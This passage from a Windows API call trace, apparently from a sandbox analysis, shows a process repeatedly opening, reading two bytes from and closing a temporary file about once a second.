lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0113.786] GetLastError () returned 0x0 [0113.786] SetErrorMode (uMode=0x1) returned 0x0 [0113.787] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0113.787] GetLastError () returned 0x0 [0113.787] GetFileType (hFile=0x300) returned 0x1 [0113.787] SetErrorMode (uMode=0x0) returned 0x1 [0113.787] GetFileType (hFile=0x300) returned 0x1 [0113.787] ReadFile (in: hFile=0x300, lpBuffer=0x3382750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3382750*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0113.788] GetLastError () returned 0x0 [0113.788] ReadFile (in: hFile=0x300, lpBuffer=0x3382750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3382750*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0113.788] GetLastError () returned 0x0 [0113.788] CloseHandle (hObject=0x300) returned 1 [0113.788] GetLastError () returned 0x0 [0114.802] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0114.802] GetLastError () returned 0x0 [0114.802] SetErrorMode (uMode=0x1) returned 0x0 [0114.802] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0114.803] GetLastError () returned 0x0 [0114.803] GetFileType (hFile=0x300) returned 0x1 [0114.803] SetErrorMode (uMode=0x0) returned 0x1 [0114.803] GetFileType (hFile=0x300) returned 0x1 [0114.803] ReadFile (in: hFile=0x300, lpBuffer=0x3384ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3384ab0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0114.803] GetLastError () returned 0x0 [0114.803] ReadFile (in: hFile=0x300, lpBuffer=0x3384ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3384ab0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0114.803] GetLastError () returned 0x0 [0114.803] CloseHandle (hObject=0x300) returned 1 [0114.803] GetLastError () returned 0x0 [0115.810] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0115.810] GetLastError () returned 0x0 [0115.810] SetErrorMode (uMode=0x1) returned 0x0 [0115.810] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0115.811] GetLastError () returned 0x0 [0115.811] GetFileType (hFile=0x300) returned 0x1 [0115.811] SetErrorMode (uMode=0x0) returned 0x1 [0115.811] GetFileType (hFile=0x300) returned 0x1 [0115.811] ReadFile (in: hFile=0x300, lpBuffer=0x3386e10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3386e10*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0115.812] GetLastError () returned 0x0 [0115.812] ReadFile (in: hFile=0x300, lpBuffer=0x3386e10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3386e10*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0115.812] GetLastError () returned 0x0 [0115.812] CloseHandle (hObject=0x300) returned 1 [0115.812] GetLastError () returned 0x0 [0116.827] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0116.827] GetLastError () returned 0x0 [0116.827] SetErrorMode (uMode=0x1) returned 0x0 [0116.828] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0116.828] GetLastError () returned 0x0 [0116.828] GetFileType (hFile=0x300) returned 0x1 [0116.828] SetErrorMode (uMode=0x0) returned 0x1 [0116.828] GetFileType (hFile=0x300) returned 0x1 [0116.829] ReadFile (in: hFile=0x300, lpBuffer=0x3389170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3389170*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0116.829] GetLastError () returned 0x0 [0116.829] ReadFile (in: hFile=0x300, lpBuffer=0x3389170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3389170*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0116.829] GetLastError () returned 0x0 [0116.830] CloseHandle (hObject=0x300) returned 1 [0116.830] GetLastError () returned 0x0 [0117.843] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0117.843] GetLastError () returned 0x0 [0117.843] SetErrorMode (uMode=0x1) returned 0x0 [0117.843] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0117.843] GetLastError () returned 0x0 [0117.843] GetFileType (hFile=0x300) returned 0x1 [0117.843] SetErrorMode (uMode=0x0) returned 0x1 [0117.843] GetFileType (hFile=0x300) returned 0x1 [0117.843] ReadFile (in: hFile=0x300, lpBuffer=0x338b4d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x338b4d0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0117.844] GetLastError () returned 0x0 [0117.844] ReadFile (in: hFile=0x300, lpBuffer=0x338b4d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x338b4d0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0117.844] GetLastError () returned 0x0 [0117.844] CloseHandle (hObject=0x300) returned 1 [0117.844] GetLastError () returned 0x0 [0118.858] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0118.858] GetLastError () returned 0x0 [0118.858] SetErrorMode (uMode=0x1) returned 0x0 [0118.859] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0118.859] GetLastError () returned 0x0 [0118.859] GetFileType (hFile=0x300) returned 0x1 [0118.859] SetErrorMode (uMode=0x0) returned 0x1 [0118.859] GetFileType (hFile=0x300) returned 0x1 [0118.859] ReadFile (in: hFile=0x300, lpBuffer=0x338d830, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x338d830*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0118.859] GetLastError () returned 0x0 [0118.859] ReadFile (in: hFile=0x300, lpBuffer=0x338d830, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x338d830*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0118.859] GetLastError () returned 0x0 [0118.859] CloseHandle (hObject=0x300) returned 1 [0118.859] GetLastError () returned 0x0 [0119.874] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0119.874] GetLastError () returned 0x0 [0119.874] SetErrorMode (uMode=0x1) returned 0x0 [0119.874] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0119.874] GetLastError () returned 0x0 [0119.874] GetFileType (hFile=0x300) returned 0x1 [0119.874] SetErrorMode (uMode=0x0) returned 0x1 [0119.874] GetFileType (hFile=0x300) returned 0x1 [0119.874] ReadFile (in: hFile=0x300, lpBuffer=0x338fb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x338fb90*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0119.875] GetLastError () returned 0x0 [0119.875] ReadFile (in: hFile=0x300, lpBuffer=0x338fb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x338fb90*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0119.875] GetLastError () returned 0x0 [0119.875] CloseHandle (hObject=0x300) returned 1 [0119.875] GetLastError () returned 0x0 [0120.885] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0120.885] GetLastError () returned 0x0 [0120.885] SetErrorMode (uMode=0x1) returned 0x0 [0120.885] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0120.885] GetLastError () returned 0x0 [0120.885] GetFileType (hFile=0x300) returned 0x1 [0120.885] SetErrorMode (uMode=0x0) returned 0x1 [0120.885] GetFileType (hFile=0x300) returned 0x1 [0120.886] ReadFile (in: hFile=0x300, lpBuffer=0x3391ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3391ef0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0120.886] GetLastError () returned 0x0 [0120.886] ReadFile (in: hFile=0x300, lpBuffer=0x3391ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3391ef0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0120.886] GetLastError () returned 0x0 [0120.886] CloseHandle (hObject=0x300) returned 1 [0120.886] GetLastError () returned 0x0 [0121.900] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0121.900] GetLastError () returned 0x0 [0121.900] SetErrorMode (uMode=0x1) returned 0x0 [0121.901] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0121.901] GetLastError () returned 0x0 [0121.901] GetFileType (hFile=0x300) returned 0x1 [0121.901] SetErrorMode (uMode=0x0) returned 0x1 [0121.901] GetFileType (hFile=0x300) returned 0x1 [0121.901] ReadFile (in: hFile=0x300, lpBuffer=0x3394250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3394250*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0121.901] GetLastError () returned 0x0 [0121.901] ReadFile (in: hFile=0x300, lpBuffer=0x3394250, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3394250*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0121.901] GetLastError () returned 0x0 [0121.902] CloseHandle (hObject=0x300) returned 1 [0121.902] GetLastError () returned 0x0 [0122.916] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0122.916] GetLastError () returned 0x0 [0122.916] SetErrorMode (uMode=0x1) returned 0x0 [0122.917] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0122.917] GetLastError () returned 0x0 [0122.917] GetFileType (hFile=0x300) returned 0x1 [0122.917] SetErrorMode (uMode=0x0) returned 0x1 [0122.917] GetFileType (hFile=0x300) returned 0x1 [0122.917] ReadFile (in: hFile=0x300, lpBuffer=0x33965b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33965b0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0122.917] GetLastError () returned 0x0 [0122.917] ReadFile (in: hFile=0x300, lpBuffer=0x33965b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33965b0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0122.917] GetLastError () returned 0x0 [0122.918] CloseHandle (hObject=0x300) returned 1 [0122.918] GetLastError () returned 0x0 [0123.932] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0123.932] GetLastError () returned 0x0 [0123.932] SetErrorMode (uMode=0x1) returned 0x0 [0123.932] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x454 [0123.932] GetLastError () returned 0x0 [0123.932] GetFileType (hFile=0x454) returned 0x1 [0123.932] SetErrorMode (uMode=0x0) returned 0x1 [0123.932] GetFileType (hFile=0x454) returned 0x1 [0123.933] ReadFile (in: hFile=0x454, lpBuffer=0x3398910, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3398910*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0123.933] GetLastError () returned 0x0 [0123.933] ReadFile (in: hFile=0x454, lpBuffer=0x3398910, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3398910*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0123.933] GetLastError () returned 0x0 [0123.933] CloseHandle (hObject=0x454) returned 1 [0123.934] GetLastError () returned 0x0 [0124.947] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0124.947] GetLastError () returned 0x0 [0124.947] SetErrorMode (uMode=0x1) returned 0x0 [0124.948] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3b8 [0124.948] GetLastError () returned 0x0 [0124.948] GetFileType (hFile=0x3b8) returned 0x1 [0124.948] SetErrorMode (uMode=0x0) returned 0x1 [0124.948] GetFileType (hFile=0x3b8) returned 0x1 [0124.948] ReadFile (in: hFile=0x3b8, lpBuffer=0x339ac70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x339ac70*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0124.949] GetLastError () returned 0x0 [0124.949] ReadFile (in: hFile=0x3b8, lpBuffer=0x339ac70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x339ac70*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0124.949] GetLastError () returned 0x0 [0124.949] CloseHandle (hObject=0x3b8) returned 1 [0124.949] GetLastError () returned 0x0 [0125.954] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0125.954] GetLastError () returned 0x0 [0125.954] SetErrorMode (uMode=0x1) returned 0x0 [0125.954] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3b8 [0125.955] GetLastError () returned 0x0 [0125.955] GetFileType (hFile=0x3b8) returned 0x1 [0125.955] SetErrorMode (uMode=0x0) returned 0x1 [0125.955] GetFileType (hFile=0x3b8) returned 0x1 [0125.955] ReadFile (in: hFile=0x3b8, lpBuffer=0x339cfd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x339cfd0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0125.955] GetLastError () returned 0x0 [0125.955] ReadFile (in: hFile=0x3b8, lpBuffer=0x339cfd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x339cfd0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0125.955] GetLastError () returned 0x0 [0125.955] CloseHandle (hObject=0x3b8) returned 1 [0125.955] GetLastError () returned 0x0 [0126.969] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0126.969] GetLastError () returned 0x0 [0126.969] SetErrorMode (uMode=0x1) returned 0x0 [0126.969] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3b8 [0126.969] GetLastError () returned 0x0 [0126.969] GetFileType (hFile=0x3b8) returned 0x1 [0126.969] SetErrorMode (uMode=0x0) returned 0x1 [0126.969] GetFileType (hFile=0x3b8) returned 0x1 [0126.969] ReadFile (in: hFile=0x3b8, lpBuffer=0x339f330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x339f330*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0126.969] GetLastError () returned 0x0 [0126.969] ReadFile (in: hFile=0x3b8, lpBuffer=0x339f330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x339f330*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0126.969] GetLastError () returned 0x0 [0126.969] CloseHandle (hObject=0x3b8) returned 1 [0126.970] GetLastError () returned 0x0 [0127.984] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0127.984] GetLastError () returned 0x0 [0127.984] SetErrorMode (uMode=0x1) returned 0x0 [0127.984] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3b8 [0127.984] GetLastError () returned 0x0 [0127.984] GetFileType (hFile=0x3b8) returned 0x1 [0127.984] SetErrorMode (uMode=0x0) returned 0x1 [0127.984] GetFileType (hFile=0x3b8) returned 0x1 [0127.985] ReadFile (in: hFile=0x3b8, lpBuffer=0x33a1690, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33a1690*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0127.985] GetLastError () returned 0x0 [0127.985] ReadFile (in: hFile=0x3b8, lpBuffer=0x33a1690, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33a1690*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0127.985] GetLastError () returned 0x0 [0127.985] CloseHandle (hObject=0x3b8) returned 1 [0127.985] GetLastError () returned 0x0 [0129.000] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0129.000] GetLastError () returned 0x0 [0129.000] SetErrorMode (uMode=0x1) returned 0x0 [0129.000] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3b8 [0129.000] GetLastError () returned 0x0 [0129.000] GetFileType (hFile=0x3b8) returned 0x1 [0129.000] SetErrorMode (uMode=0x0) returned 0x1 [0129.000] GetFileType (hFile=0x3b8) returned 0x1 [0129.000] ReadFile (in: hFile=0x3b8, lpBuffer=0x33a39f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33a39f0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0129.001] GetLastError () returned 0x0 [0129.001] ReadFile (in: hFile=0x3b8, lpBuffer=0x33a39f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33a39f0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0129.001] GetLastError () returned 0x0 [0129.001] CloseHandle (hObject=0x3b8) returned 1 [0129.001] GetLastError () returned 0x0 [0130.044] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0130.044] GetLastError () returned 0x0 [0130.044] SetErrorMode (uMode=0x1) returned 0x0 [0130.045] 